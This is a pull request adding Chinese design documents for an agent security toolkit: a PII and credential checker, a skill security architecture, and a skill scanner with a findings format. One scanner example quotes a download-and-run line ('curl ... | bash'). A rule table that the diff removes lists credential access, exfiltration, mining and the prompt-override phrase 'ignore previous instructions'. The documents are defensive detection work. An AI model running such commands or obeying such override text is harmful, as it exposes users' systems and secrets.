### PR TITLE
docs(sec-core): add skill security architecture design

### DIFF
--- a/src/agent-sec-core/docs/design/PII_CHECKER_CN.md
+++ b/src/agent-sec-core/docs/design/PII_CHECKER_CN.md
@@ -1,0 +1,169 @@
+# PIIChecker 设计
+
+## 1. 文档定位
+
+PIIChecker 是 `agent-sec-core` 的隐私/敏感信息检测能力，用于识别文本、文件或工具输出中的个人信息、凭据和敏感数据。
+
+## 2. 设计目标
+
+1. 识别常见 PII、凭据和密钥类敏感信息。
+2. 默认输出脱敏 evidence，避免在扫描结果中传播原始敏感内容。
+3. 提供 CLI、Python API 和安全中间层集成接口。
+4. 支持规则、校验器和上下文评分组合，降低误报。
+
+## 3. 检测范围
+
+| 类别 | 示例 |
+|---|---|
+| 个人身份信息 | 姓名、身份证/证件号、护照号 |
+| 联系方式 | 邮箱、手机号、固定电话 |
+| 地址信息 | 详细地址、邮编 |
+| 金融信息 | 银行卡号、IBAN、信用卡号 |
+| 网络身份 | IP、MAC、设备 ID |
+| 凭据/密钥 | API key、OAuth token、JWT、私钥片段、SSH key |
+| 云厂商凭据 | AK/SK、临时 token、访问密钥 ID |
+
+## 4. 架构
+
+```text
+CLI / Python API / security_middleware / hook
+        |
+        v
+PIIChecker
+        |
+        +--> Preprocessor
+        +--> Regex Detector
+        +--> Validator
+        +--> Context Scorer
+        +--> Redactor
+        |
+        v
+PiiScanResult
+```
+
+## 5. CLI 设计
+
+```bash
+agent-sec-cli scan-pii --text "..."
+agent-sec-cli scan-pii --input /path/to/file
+agent-sec-cli scan-pii --input /path/to/file --format json
+```
+
+参数：
+
+| 参数 | 默认 | 说明 |
+|---|---|---|
+| `--text` | 无 | 直接扫描文本 |
+| `--input` | 无 | 扫描文件 |
+| `--format` | `json` | `json` 或 `text` |
+| `--include-low-confidence` | false | 是否输出低置信度发现 |
+| `--raw-evidence` | false | 是否允许输出原始 evidence，默认禁止 |
+
+## 6. 输出 Schema
+
+默认 JSON 输出：
+
+```jsonc
+{
+  "ok": true,
+  "verdict": "deny",
+  "summary": "Detected 2 sensitive item(s), including credential-like data",
+  "findings": [
+    {
+      "type": "email",
+      "category": "pii",
+      "severity": "warn",
+      "confidence": 0.98,
+      "evidence_redacted": "te***@example.com",
+      "span": { "start": 12, "end": 28 },
+      "metadata": {}
+    },
+    {
+      "type": "api_key",
+      "category": "credential",
+      "severity": "deny",
+      "confidence": 0.95,
+      "evidence_redacted": "sk-***abcd",
+      "span": { "start": 50, "end": 92 },
+      "metadata": { "provider": "generic" }
+    }
+  ],
+  "elapsed_ms": 3
+}
+```
+
+`verdict` 计算：
+
+| findings | verdict |
+|---|---|
+| 空 | `pass` |
+| 仅低/中风险 PII | `warn` |
+| 包含凭据、私钥、token | `deny` |
+| 内部错误 | `error` |
+
+## 7. 脱敏策略
+
+默认只输出 `evidence_redacted`，不输出原始 evidence。
+
+| 类型 | 脱敏示例 |
+|---|---|
+| 邮箱 | `te***@example.com` |
+| 手机号 | `138****0000` |
+| 银行卡 | `6222********1234` |
+| API key | `sk-***abcd` |
+| 私钥 | `<private-key-redacted>` |
+
+只有显式指定 `--raw-evidence` 且运行环境允许时，才输出原始 evidence。hook、审计日志和报告场景应使用脱敏输出。
+
+## 8. 检测器设计
+
+### 8.1 Regex Detector
+
+用于高确定性模式：
+
+- 邮箱。
+- 手机号。
+- JWT。
+- PEM 私钥头尾。
+- 常见 API key 前缀。
+- 云厂商 access key。
+
+### 8.2 Validator
+
+用于降低误报：
+
+- 信用卡 Luhn 校验。
+- 身份证校验位。
+- 日期合法性。
+- JWT 三段结构和 base64url 检查。
+
+### 8.3 Context Scorer
+
+结合上下文关键词调整置信度：
+
+| 上下文 | 影响 |
+|---|---|
+| `password`、`secret`、`token`、`api_key` | 提高凭据置信度 |
+| `example`、`dummy`、`test`、`.invalid` | 降低真实泄漏置信度 |
+| 代码注释/文档样例 | 降低默认严重度，但不完全忽略 |
+
+## 9. 集成接口
+
+| 接口 | 说明 |
+|---|---|
+| CLI | `agent-sec-cli scan-pii` |
+| Python API | `agent_sec_cli.pii_checker.scan(...)` |
+| security_middleware | 作为独立 backend 接入统一调用链 |
+| security_events | 记录脱敏后的敏感信息检测事件 |
+
+## 10. 测试与评测
+
+测试重点：
+
+- 每种 detector 的 positive/negative 样本。
+- 脱敏结果不泄漏原文。
+- validator 降低误报。
+- `--raw-evidence` 默认关闭。
+- 大文件扫描的性能和内存占用。
+
+测试数据必须使用伪造样本，不允许包含真实用户数据。

--- a/src/agent-sec-core/docs/design/README_CN.md
+++ b/src/agent-sec-core/docs/design/README_CN.md
@@ -1,0 +1,30 @@
+# Agent Sec Core 设计文档索引
+
+本文档目录用于描述 `agent-sec-core` 的安全能力设计。各组件按职责独立成文；体系类文档只说明组件关系，不替代组件详细设计。
+
+## Skill 安全相关文档
+
+| 目标 | 建议阅读 |
+|---|---|
+| 快速了解 Skill 安全整体结构 | [SKILL_SECURITY_ARCHITECTURE_CN.md](SKILL_SECURITY_ARCHITECTURE_CN.md) |
+| 了解 Skill 账本、签名、版本链和状态检查 | [SKILL_LEDGER_CN.md](SKILL_LEDGER_CN.md) |
+| 了解 Skill 扫描器类型和扫描结果归一化 | [SKILL_SCANNER_CN.md](SKILL_SCANNER_CN.md) |
+
+## 独立安全组件文档
+
+| 目标 | 建议阅读 |
+|---|---|
+| 了解 Prompt 注入/越狱检测组件 | [PROMPT_SCANNER.md](PROMPT_SCANNER.md) |
+| 了解隐私/敏感信息检测组件 | [PII_CHECKER_CN.md](PII_CHECKER_CN.md) |
+
+## 文档简介
+
+`SKILL_SECURITY_ARCHITECTURE_CN.md` 是 Skill 安全体系入口，负责说明 Skill 安全内部的模块关系和数据流。
+
+`SKILL_LEDGER_CN.md` 是 `skill-ledger` 组件详细设计，聚焦 manifest、Ed25519 签名、版本链、`check` / `certify` / `status` / `audit` 以及 Scanner Registry。
+
+`SKILL_SCANNER_CN.md` 是 Skill 扫描器设计，说明 `skill-vetter`、Skill 代码扫描 adapter 和 `NormalizedFinding` 归一化约定。
+
+`PROMPT_SCANNER.md` 描述 Prompt 注入与越狱检测组件，覆盖预处理、规则检测、ML 分类、输出 schema 和审计日志。
+
+`PII_CHECKER_CN.md` 描述隐私与敏感信息检测组件，覆盖检测范围、脱敏输出、CLI/API、检测器结构和测试要求。

--- a/src/agent-sec-core/docs/design/SKILL_LEDGER_CN.md
+++ b/src/agent-sec-core/docs/design/SKILL_LEDGER_CN.md
@@ -1,5 +1,7 @@
 # Skill 安全技术方案（skill-ledger）
 
+> 本文是 `skill-ledger` 组件级详细设计，聚焦 manifest、签名、版本链、Scanner Registry 和 CLI 工作流。Skill 安全体系总览和模块关系见 [SKILL_SECURITY_ARCHITECTURE_CN.md](SKILL_SECURITY_ARCHITECTURE_CN.md)，扫描器设计见 [SKILL_SCANNER_CN.md](SKILL_SCANNER_CN.md)。
+
 ## 背景与目标
 
 ### 问题
@@ -12,12 +14,6 @@ AI Agent 通过加载 Skill（结构化指令 + 辅助脚本）扩展能力。Sk
 2. **安全扫描集成**：提供可扩展的扫描器框架，支持 Agent 驱动（skill-vetter）和 CLI 自动调用两种模式
 3. **实时守卫**：在 Skill 加载时自动执行完整性检查（hook 层），对异常状态输出告警
 4. **零阻断**：所有检查采用 fail-open 策略——仅告警不阻断，确保 Agent 可用性
-
-### 非目标
-
-- 不替代操作系统级沙箱或进程隔离
-- 不实现运行时行为监控（仅静态内容检查 + 签名验证）
-- 当前版本不阻断 Skill 执行（后续可升级为可配置阻断）
 
 ---
 
@@ -202,7 +198,7 @@ class SigningBackend(Protocol):
       "parser": "findings-array",
       "description": "LLM-driven 4-phase skill audit"
     }
-    // 后续扩展示例（本版本不实现）：
+    // 扩展示例（本版本不实现）：
     // { "name": "pattern-scanner", "type": "builtin", "enabled": true, "parser": "findings-array" }
     // { "name": "license-checker", "type": "cli", "command": "...", "parser": "license-checker" }
     // { "name": "cloud-scanner", "type": "api", "endpoint": "...", "parser": "cloud-scanner" }
@@ -213,7 +209,7 @@ class SigningBackend(Protocol):
     "findings-array": {            // 恒等解析器，输入已是标准格式（本版本唯一实现）
       "type": "findings-array"
     }
-    // 后续扩展示例（本版本不实现）：
+    // 扩展示例（本版本不实现）：
     // "license-checker": { "type": "field-mapping", "rootPath": "$.results", "mappings": {...}, "levelMap": {...} }
     // "sarif-parser": { "type": "sarif" }
     // "custom-parser": { "type": "custom", "entrypoint": "my_module:parse" }
@@ -499,42 +495,11 @@ skill-ledger/
 
 ### Phase 1：安全扫描（vetter）
 
-Agent 调用此 Skill 后，按 SKILL.md 指令使用 read/grep/shell tool 逐文件审查目标 Skill，参照 [skill-vetter 协议](https://github.com/openclaw/skills/blob/main/skills/spclaudehome/skill-vetter/SKILL.md)的四阶段框架：
+Agent 调用此 Skill 后，按 SKILL.md 指令使用 read/grep/shell tool 审查目标 Skill，并输出 `NormalizedFinding[]` JSON 文件。`skill-vetter` 在 Scanner Registry 中注册为 `type: "skill"` 扫描器，CLI 不直接调用它，而是在 Phase 2 接收其 findings 文件。
 
-1. **来源验证**：检查 Skill 来源（本地/远程/extension）、是否有 README/LICENSE
-2. **强制代码审查**：逐文件扫描危险模式（下文规则表）
-3. **权限边界评估**：Skill 声明的 `allowedTools` 与实际内容是否对齐
-4. **风险分级**：汇总 findings，输出结构化 JSON
+`skill-vetter` 的扫描阶段、规则范围、输出格式和与 Scanner Registry 的关系见 [SKILL_SCANNER_CN.md](SKILL_SCANNER_CN.md)。
 
-> **与 Scanner Registry 的关系**：skill-vetter 在 `config.json` 中注册为 `type: "skill"` 扫描器（见 §3 扫描能力架构），是本版本唯一实现的扫描器。Phase 1 即为 Agent 层编排 `skill` 类型扫描器的标准流程。其输出通过 `findings-array` parser 归一化为 `NormalizedFinding[]`，确保与 `certify` 的聚合逻辑对齐。后续将实现内置 `pattern-scanner` 覆盖同一规则表的静态检测子集，作为无 LLM 环境下的降级替代，届时 `certify` 的自动调用模式可直接触发。
-
-**代码文件规则**（.js/.ts/.sh/.py 等）：
-
-| 规则 ID | 级别 | 检测目标 |
-|---------|------|---------|
-| `dangerous-exec` | deny | child_process exec/spawn、subprocess |
-| `dynamic-code-eval` | deny | eval()、new Function() |
-| `env-harvesting` | deny | process.env 批量读取 + 网络发送 |
-| `credential-access` | deny | 凭据与敏感文件访问（`~/.ssh/`、`.env`） |
-| `system-modification` | deny | 系统文件篡改（`/etc/`、crontab） |
-| `crypto-mining` | deny | stratum/coinhive/xmrig 特征 |
-| `obfuscated-code` | warn | hex/base64 编码 + decode |
-| `suspicious-network` | warn | 非标准端口、直连 IP |
-| `exfiltration-pattern` | warn | 文件读取 + 网络发送组合 |
-| `agent-data-access` | warn | Agent 身份数据访问（`MEMORY.md` 等） |
-| `unauthorized-install` | warn | 未声明的包安装 |
-
-**Prompt 文档规则**（.md 文件）：
-
-| 规则 ID | 级别 | 检测目标 |
-|---------|------|---------|
-| `prompt-override` | deny | "ignore previous instructions" 等覆盖指令 |
-| `hidden-instruction` | deny | 零宽字符、注释伪装隐藏指令 |
-| `unrestricted-tool-use` | warn | 引导无约束 shell 执行 |
-| `external-fetch-exec` | warn | 引导下载并执行外部内容 |
-| `privilege-escalation` | warn | 引导 sudo、修改系统文件 |
-
-Phase 1 输出：Agent 将 findings 写入临时文件（如 `/tmp/skill-vetter-findings-<skill_name>.json`）。
+Phase 1 输出路径示例：`/tmp/skill-vetter-findings-<skill_name>.json`。
 
 ### Phase 2：建版签名（ledger）
 
@@ -548,30 +513,74 @@ Phase 2 不能独立执行——SKILL.md 中明确约束"必须先完成 Phase 1
 
 ---
 
-## 5. Hook 告警策略
+## 5. 用户交互设计
 
 ### 设计原则
 
-为简化实现、减少对用户的干扰，当 hook 层（`skill-ledger check`）检测到非 `pass` 状态时，**仅输出告警信息，不阻断 Skill 执行**。告警信息通过宿主系统的日志/消息通道呈现给用户，用户可事后选择手动调用 skill-ledger Skill 进行扫描建版。
+`skill-ledger` 的交互目标是把扫描结果接入用户关键路径，让用户在调用、安装和周期复查 Skill 时看到可理解、可追溯、可操作的安全状态。交互层只消费 `check`、`certify`、`status` 的结构化结果，不直接解析 `.skill-meta/` 文件。
 
-### 各状态的行为
+当前交互默认提示风险但不阻断执行。是否升级为确认或阻断，由宿主系统策略解释 `scanStatus` 和 `policy` 决定，不改变 SignedManifest 数据结构。
 
-| 状态 | 行为 | 告警内容 |
+### 交互入口
+
+| 场景 | 触发时机 | 调用方式 | 用户可见结果 |
+|---|---|---|---|
+| Skill 调用前检查 | pre hook 调用 Skill 时 | `skill-ledger check <skill_dir>` | 非 `pass` 状态展示简短 warning |
+| prompt 安装/启用 Skill | 用户通过 prompt 请求安装、启用或首次使用 Skill 时 | `check` → 扫描 → `certify` | 展示扫描结论和关键 findings |
+| 周期性复查 | OpenClaw 定时任务场景 | `skill-ledger status --verbose` | 展示整体状态和需关注 Skill |
+
+### 5.1 Pre Hook 调用提示
+
+用户调用 Skill 时，宿主在加载前执行：
+
+```bash
+agent-sec-cli skill-ledger check <skill_dir>
+```
+
+| 状态 | 行为 | 提示内容 |
 |------|------|---------|
 | `pass` | 静默放行 | 无 |
-| `warn` | 放行 + 告警 | `⚠️ Skill '<name>' 存在低风险项，建议关注` |
-| `drifted` | 放行 + 告警 | `⚠️ Skill '<name>' 内容已变更，尚未重新扫描` |
-| `none` | 放行 + 告警 | `⚠️ Skill '<name>' 尚未经过安全扫描` |
-| `deny` | 放行 + 告警 | `🚨 Skill '<name>' 上次扫描存在高危项，请尽快处理` |
-| `tampered` | 放行 + 告警 | `🚨 Skill '<name>' 元数据签名校验失败，建议重新扫描建版` |
+| `warn` | 放行 + warning | Skill 存在低风险发现，建议审查 |
+| `drifted` | 放行 + warning | Skill 文件已变更，建议重新扫描认证 |
+| `none` | 放行 + warning | Skill 尚未经过安全扫描 |
+| `deny` | 放行 + warning | Skill 上次扫描存在高风险发现 |
+| `tampered` | 放行 + warning | Skill 元数据签名校验失败，建议重新认证 |
 
-所有非 `pass` 状态均**仅告警、不阻断**。`tampered` 触发条件较窄（内容未变但 manifest 被伪造），属于元数据可信度问题而非紧急安全事件，告警提示用户重新执行扫描建版即可恢复正常。
+pre hook 提示只包含 Skill 名称、状态、核心原因和下一步建议；详细 findings 不在热路径展开。
 
-所有告警均通过宿主系统日志/消息通道输出，保证可追溯。
+### 5.2 Prompt 安装/启用扫描报告
 
-### 后续升级路径
+用户通过 prompt 请求安装、启用或首次使用 Skill 时，可触发扫描与认证流程：
 
-当前的告警模式为最小可用版本。后续可按需升级：对 `deny` 状态改为阻断 + 用户选择，对 `drifted`/`none` 状态可配置为自动触发扫描建版。升级时仅需修改 hook handler 的返回值，不影响 CLI 和 Skill 侧逻辑。
+```text
+resolve skill_dir
+  -> skill-ledger check <skill_dir>
+  -> 如需扫描：执行 Skill Scanner / skill-vetter
+  -> skill-ledger certify <skill_dir> ...
+  -> 展示扫描报告
+```
+
+报告展示必要信息即可：
+
+| 区块 | 内容 |
+|---|---|
+| 基本信息 | Skill 名称、路径、版本号、文件数、状态指纹 |
+| 扫描结论 | `pass` / `warn` / `deny` / `none` |
+| 发现摘要 | deny/warn 数量、规则 ID、文件位置 |
+| 文件变更 | 对 `drifted` 状态展示新增、删除、修改文件 |
+| 建议操作 | 继续使用、重新扫描、修复后再认证、禁用或移除 |
+
+报告可以比 pre hook 更详细，但 evidence 应摘要化，避免输出凭据、token、私钥等敏感内容。
+
+### 5.3 OpenClaw 周期性扫描报告
+
+OpenClaw 可通过定时任务周期调用：
+
+```bash
+agent-sec-cli skill-ledger status --verbose
+```
+
+周期报告展示总数、各状态计数、`drifted` / `warn` / `deny` / `tampered` Skill 列表和建议操作。周期报告提供整体态势视图，pre hook 仍负责单次调用路径提示。
 
 ### 向后兼容
 

--- a/src/agent-sec-core/docs/design/SKILL_SCANNER_CN.md
+++ b/src/agent-sec-core/docs/design/SKILL_SCANNER_CN.md
@@ -1,0 +1,203 @@
+# Skill Scanner 设计
+
+## 1. 文档定位
+
+本文描述 Skill Scanner 的设计。Skill Scanner 负责审查 Skill 内容并输出 `NormalizedFinding[]`，由 `skill-ledger certify` 转换为 `ScanEntry` 后写入 SignedManifest。
+
+`skill-ledger` 负责签名、版本链和状态聚合；Skill Scanner 负责产生扫描发现。
+
+## 2. Scanner Registry
+
+`skill-ledger` 通过 Scanner Registry 识别扫描器、调用方式和结果 parser。
+
+| Scanner | 类型 | 状态 | 说明 |
+|---|---|---|---|
+| `skill-vetter` | `skill` | 已有 | Agent 按协议执行四阶段 Skill 审查，输出 findings 文件 |
+| `skill-code-scanner` | `builtin` | 设计中 | 遍历 Skill 中的代码文件，调用独立 `code-scanner` 组件并转换结果 |
+
+`skill` 类型由 Agent 或用户提供 findings 文件，CLI 不直接调用。`builtin` 类型由 CLI 进程内调用。
+
+## 3. NormalizedFinding
+
+所有扫描器输出最终归一化为统一结构：
+
+```jsonc
+{
+  "rule": "dangerous-exec",
+  "level": "deny",
+  "message": "subprocess execution detected",
+  "file": "scripts/run.py",
+  "line": 42,
+  "metadata": {}
+}
+```
+
+字段说明：
+
+| 字段 | 必选 | 说明 |
+|---|---:|---|
+| `rule` | 是 | 规则或检查 ID |
+| `level` | 是 | `deny` / `warn` / `pass` |
+| `message` | 是 | 人类可读说明 |
+| `file` | 否 | 相对 Skill 目录的文件路径 |
+| `line` | 否 | 行号 |
+| `metadata` | 否 | 扫描器特定字段 |
+
+`scanStatus` 聚合由 `skill-ledger` 完成：任一扫描器为 `deny` 则整体为 `deny`，否则任一扫描器为 `warn` 则整体为 `warn`，全部通过则为 `pass`。
+
+## 4. 扫描器设计
+
+本章按扫描器分别说明输入、调用方式、输出和归一化规则。每个小节对应一个 scanner。
+
+### 4.1 skill-vetter
+
+`skill-vetter` 是 Agent 驱动的 Skill 审查协议，注册为：
+
+```jsonc
+{
+  "name": "skill-vetter",
+  "type": "skill",
+  "parser": "findings-array",
+  "description": "LLM-driven 4-phase skill audit"
+}
+```
+
+执行方式：
+
+1. Agent 根据 `skills/skill-ledger/references/skill-vetter-protocol.md` 审查目标 Skill。
+2. Agent 输出 `NormalizedFinding[]` JSON 文件。
+3. 用户或 Agent 调用：
+
+```bash
+agent-sec-cli skill-ledger certify <skill_dir> \
+  --findings /tmp/skill-vetter-findings-<skill_name>.json \
+  --scanner skill-vetter
+```
+
+四阶段审查框架：
+
+| 阶段 | 内容 |
+|---|---|
+| 来源验证 | 检查目录结构、`SKILL.md`、front matter、隐藏文件和凭据类文件 |
+| 代码审查 | 检查脚本中的执行、网络、凭据访问、系统修改等风险 |
+| 权限边界评估 | 比对声明能力与实际行为 |
+| 风险分级与输出 | 汇总 findings 并输出 JSON |
+
+具体规则以 `skills/skill-ledger/references/skill-vetter-protocol.md` 为准。
+
+### 4.2 skill-code-scanner
+
+`skill-code-scanner` 是 Skill Scanner 对独立 `code-scanner` 组件的 adapter。它不改变 `code-scanner` 的输入输出模型，只负责 Skill 目录适配。
+
+职责：
+
+1. 遍历 Skill 目录中的代码文件。
+2. 判断语言类型。
+3. 调用 `code-scanner` 扫描代码片段。
+4. 将 `ScanResult.findings[]` 转换为 `NormalizedFinding[]`。
+
+建议注册：
+
+```jsonc
+{
+  "name": "skill-code-scanner",
+  "type": "builtin",
+  "parser": "findings-array",
+  "enabled": true,
+  "description": "Scan Skill code files via code-scanner"
+}
+```
+
+默认扫描文件类型：
+
+| 语言 | 文件 |
+|---|---|
+| Bash | `*.sh`、无扩展但 shebang 为 shell 的文件 |
+| Python | `*.py`、无扩展但 shebang 为 python 的文件 |
+
+默认跳过目录：
+
+```text
+.skill-meta/
+.git/
+node_modules/
+__pycache__/
+.pytest_cache/
+dist/
+build/
+```
+
+结果转换规则：
+
+| code-scanner 字段 | NormalizedFinding 字段 |
+|---|---|
+| `rule_id` | `rule` |
+| `severity` | `level` |
+| `desc_zh` / `desc_en` | `message` |
+| 当前文件路径 | `file` |
+| 暂无行号 | `line: null` |
+| `evidence`、`language`、`engine_version` | `metadata` |
+
+示例：
+
+```jsonc
+{
+  "rule": "shell-download-exec",
+  "level": "deny",
+  "message": "下载并执行远程脚本",
+  "file": "scripts/install.sh",
+  "metadata": {
+    "source": "code-scanner",
+    "language": "bash",
+    "evidence": ["curl http://example.com/a.sh | bash"]
+  }
+}
+```
+
+## 5. certify 集成
+
+外部 findings 模式：
+
+```bash
+agent-sec-cli skill-ledger certify <skill_dir> \
+  --findings /tmp/skill-vetter-findings-<skill_name>.json \
+  --scanner skill-vetter
+```
+
+自动调用模式：
+
+```bash
+agent-sec-cli skill-ledger certify <skill_dir> \
+  --scanners skill-code-scanner
+```
+
+多个 scanner 的结果写入同一个 manifest：
+
+```jsonc
+{
+  "scans": [
+    {
+      "scanner": "skill-vetter",
+      "status": "pass",
+      "findings": []
+    },
+    {
+      "scanner": "skill-code-scanner",
+      "status": "warn",
+      "findings": []
+    }
+  ],
+  "scanStatus": "warn"
+}
+```
+
+## 6. 测试要点
+
+| 层级 | 覆盖内容 |
+|---|---|
+| 单元测试 | findings parser、结果转换、语言识别、目录跳过 |
+| 集成测试 | `certify --findings` 写入 `skill-vetter` scan entry |
+| 集成测试 | `certify --scanners skill-code-scanner` 写入 builtin scan entry |
+| 回归样本 | clean / warn / deny Skill fixture |
+
+Benchmark 数据集和报告流程保留为 TODO，不在本文展开。

--- a/src/agent-sec-core/docs/design/SKILL_SECURITY_ARCHITECTURE_CN.md
+++ b/src/agent-sec-core/docs/design/SKILL_SECURITY_ARCHITECTURE_CN.md
@@ -1,0 +1,101 @@
+# Skill 安全体系设计
+
+## 1. 文档定位
+
+本文是 Skill 安全体系的总览文档，说明 `agent-sec-core` 中与 Skill 安全相关的模块边界、数据流和核心状态模型。组件内部机制分别见：
+
+- [SKILL_LEDGER_CN.md](SKILL_LEDGER_CN.md)：Skill 账本、签名、版本链和状态检查。
+- [SKILL_SCANNER_CN.md](SKILL_SCANNER_CN.md)：Skill 扫描器、扫描结果归一化和扫描器接入。
+
+## 2. 背景
+
+Skill 通常由 `SKILL.md`、辅助脚本、配置、样例和元数据组成。Agent 加载 Skill 后，会根据其中的指令和脚本扩展自身能力，因此需要对 Skill 的来源、内容、变更和扫描结果建立可验证记录。
+
+Skill 安全体系关注三类问题：
+
+| 问题 | 说明 |
+|---|---|
+| 完整性 | Skill 文件是否被新增、删除或修改 |
+| 可信状态 | Skill 的安全状态是否由本机可信密钥签名 |
+| 扫描结论 | Skill 内容审查结果是否可归档、可追溯、可聚合 |
+
+## 3. 模块划分
+
+| 模块 | 职责 | 详细设计 |
+|---|---|---|
+| `skill-ledger` | 维护 SignedManifest、文件哈希、版本链、扫描结果和聚合状态 | [SKILL_LEDGER_CN.md](SKILL_LEDGER_CN.md) |
+| Skill Scanner | 产生 `NormalizedFinding[]`，供 `skill-ledger certify` 写入 `scans[]` | [SKILL_SCANNER_CN.md](SKILL_SCANNER_CN.md) |
+| Hook 集成 | 在 Skill 加载路径调用 `skill-ledger check`，根据状态输出提示 | [SKILL_LEDGER_CN.md](SKILL_LEDGER_CN.md) |
+| 状态报告 | 通过 `skill-ledger status` 汇总已发现 Skill 的整体状态 | [SKILL_LEDGER_CN.md](SKILL_LEDGER_CN.md) |
+
+## 4. 数据流
+
+```text
+Skill directory
+      |
+      v
+skill-ledger check
+      |
+      +--> compute file hashes
+      +--> verify SignedManifest
+      +--> compare scanStatus
+      |
+      v
+pass / none / drifted / warn / deny / tampered
+
+
+Skill scanner
+      |
+      v
+NormalizedFinding[]
+      |
+      v
+skill-ledger certify
+      |
+      +--> build ScanEntry
+      +--> aggregate scanStatus
+      +--> sign SignedManifest
+      |
+      v
+.skill-meta/latest.json
+```
+
+## 5. 状态模型
+
+| 状态 | 含义 | 典型来源 |
+|---|---|---|
+| `pass` | 文件未变，签名有效，扫描通过 | `scanStatus=pass` |
+| `none` | 已建立基线，但尚无有效扫描结论 | 首次 check 或尚未 certify findings |
+| `drifted` | 文件哈希与 manifest 不一致 | Skill 文件新增、删除或修改 |
+| `warn` | 扫描存在低风险发现 | 任一扫描器输出 `warn` |
+| `deny` | 扫描存在高风险发现 | 任一扫描器输出 `deny` |
+| `tampered` | manifest 签名或版本链校验失败 | `.skill-meta/` 被篡改或密钥不匹配 |
+
+`skill-ledger` 只负责状态计算和签名归档。具体扫描规则由 Skill Scanner 提供。
+
+## 6. Scanner Registry
+
+Scanner Registry 是 `skill-ledger` 接收扫描结果的扩展点。扫描器按照调用方式分为：
+
+| 类型 | 调用方式 | 示例 |
+|---|---|---|
+| `skill` | Agent 按协议执行，用户或 Agent 提供 findings 文件 | `skill-vetter` |
+| `builtin` | CLI 进程内调用 | Skill 代码扫描 adapter |
+| `cli` | 子进程调用外部工具 | 预留 |
+| `api` | 调用远端服务 | 预留 |
+
+所有扫描器最终都需要输出或被转换为 `NormalizedFinding[]`。归一化约定见 [SKILL_SCANNER_CN.md](SKILL_SCANNER_CN.md)。
+
+## 7. 宿主集成
+
+Skill 安全体系面向 OpenClaw 和 copilot-shell 提供一致语义：
+
+```text
+Skill load
+  -> resolve skill_dir
+  -> agent-sec-cli skill-ledger check <skill_dir>
+  -> pass: silent allow
+  -> non-pass: allow with warning
+```
+
+当前策略以提示为主，不改变 Skill 的执行可用性。Hook 层只解释 `skill-ledger` 状态，不改变 SignedManifest 数据结构。


### PR DESCRIPTION
## Description

Add design documentation for the agent-sec-core Skill security architecture:

- add a concise design document index for agent-sec-core
- add the Skill security architecture overview
- add the Skill Scanner design, including `skill-vetter` and `skill-code-scanner`
- add the PIIChecker design
- update `SKILL_LEDGER_CN.md` to point scanner details to `SKILL_SCANNER_CN.md`

## Related Issue

no-issue: documentation-only design update requested during design review.

## Type of Change

- [ ] Bug fix (non-breaking change that fixes an issue)
- [ ] New feature (non-breaking change that adds functionality)
- [ ] Breaking change (fix or feature that would cause existing functionality to not work as expected)
- [x] Documentation update
- [ ] Refactoring (no functional change)
- [ ] Performance improvement
- [ ] CI/CD or build changes

## Scope

- [ ] `cosh` (copilot-shell)
- [x] `sec-core` (agent-sec-core)
- [ ] `skill` (os-skills)
- [ ] `sight` (agentsight)
- [ ] `tokenless` (tokenless)
- [ ] Multiple / Project-wide

## Checklist

- [x] I have read the [Contributing Guide](../CONTRIBUTING.md)
- [ ] My code follows the project's code style
- [ ] I have added tests that prove my fix is effective or that my feature works
- [x] I have updated the documentation accordingly
- [ ] For `cosh`: Lint passes, type check passes, and tests pass
- [ ] For `sec-core` (Rust): `cargo clippy -- -D warnings` and `cargo fmt --check` pass
- [ ] For `sec-core` (Python): Ruff format and pytest pass
- [ ] For `skill`: Skill directory structure is valid and shell scripts pass syntax check
- [ ] For `sight`: `cargo clippy -- -D warnings` and `cargo fmt --check` pass
- [ ] For `tokenless`: `cargo clippy -- -D warnings` and `cargo fmt --check` pass
- [ ] Lock files are up to date (`package-lock.json` / `Cargo.lock`)

## Testing

Documentation-only change. Validated Markdown links in `src/agent-sec-core/docs/design`:

```bash
python3 - <<'PY'
from pathlib import Path
import re, sys
root = Path('src/agent-sec-core/docs/design')
missing = []
for path in root.glob('*.md'):
    text = path.read_text(encoding='utf-8')
    for m in re.finditer(r'\[[^\]]+\]\(([^)]+\.md)(?:#[^)]+)?\)', text):
        target = m.group(1)
        if '://' in target or target.startswith('#'):
            continue
        if not (path.parent / target).exists():
            missing.append((str(path), target))
if missing:
    for item in missing:
        print('missing link:', item[0], '->', item[1])
    sys.exit(1)
print('markdown links ok')
PY
```

Result:

```text
markdown links ok
```

## Additional Notes

This PR contains a single docs commit on top of `upstream/main`.
